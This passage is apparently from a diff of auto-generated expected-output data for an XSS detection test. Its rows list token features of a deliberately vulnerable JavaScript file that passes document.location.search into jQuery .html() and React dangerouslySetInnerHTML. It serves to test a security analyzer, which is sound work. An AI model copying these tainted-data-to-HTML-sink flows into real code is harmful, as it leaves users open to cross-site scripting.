element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:211:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:211:12 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:211:12 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:211:12 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | 'arguments' object of method test of class C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | 'arguments' object of method test of class C1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | 'arguments' object of method test of class C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | 'arguments' object of method test of class C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | 'arguments' object of method test of class C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | () {\\n ... } | assignedToPropName | test | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | () {\\n ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | () {\\n ... } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | () {\\n ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | () {\\n ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | () {\\n ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | exceptional return of method test of class C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | exceptional return of method test of class C1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | exceptional return of method test of class C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | exceptional return of method test of class C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | exceptional return of method test of class C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | return of method test of class C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | return of method test of class C1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | return of method test of class C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | return of method test of class C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:220:9 | return of method test of class C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | $('myId ... inted1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | $('myId ... inted1) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | $('myId ... inted1) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | $('myId ... inted1) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | $('myId ... inted1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | exceptional return of $('myId ... inted1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | exceptional return of $('myId ... inted1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | exceptional return of $('myId ... inted1) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | exceptional return of $('myId ... inted1) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:13:212:47 | exceptional return of $('myId ... inted1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:212:15:212:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:212:15:212:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:212:15:212:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16895,6 +117077,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:212:15:212:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:212:15:212:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:212:15:212:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:23:212:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:23:212:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:23:212:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:23:212:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:23:212:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:37 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:37 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:37 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:37 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:28:212:37 | this.state | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:212:28:212:46 | this.state.tainted1 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:212:28:212:46 | this.state.tainted1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:212:28:212:46 | this.state.tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 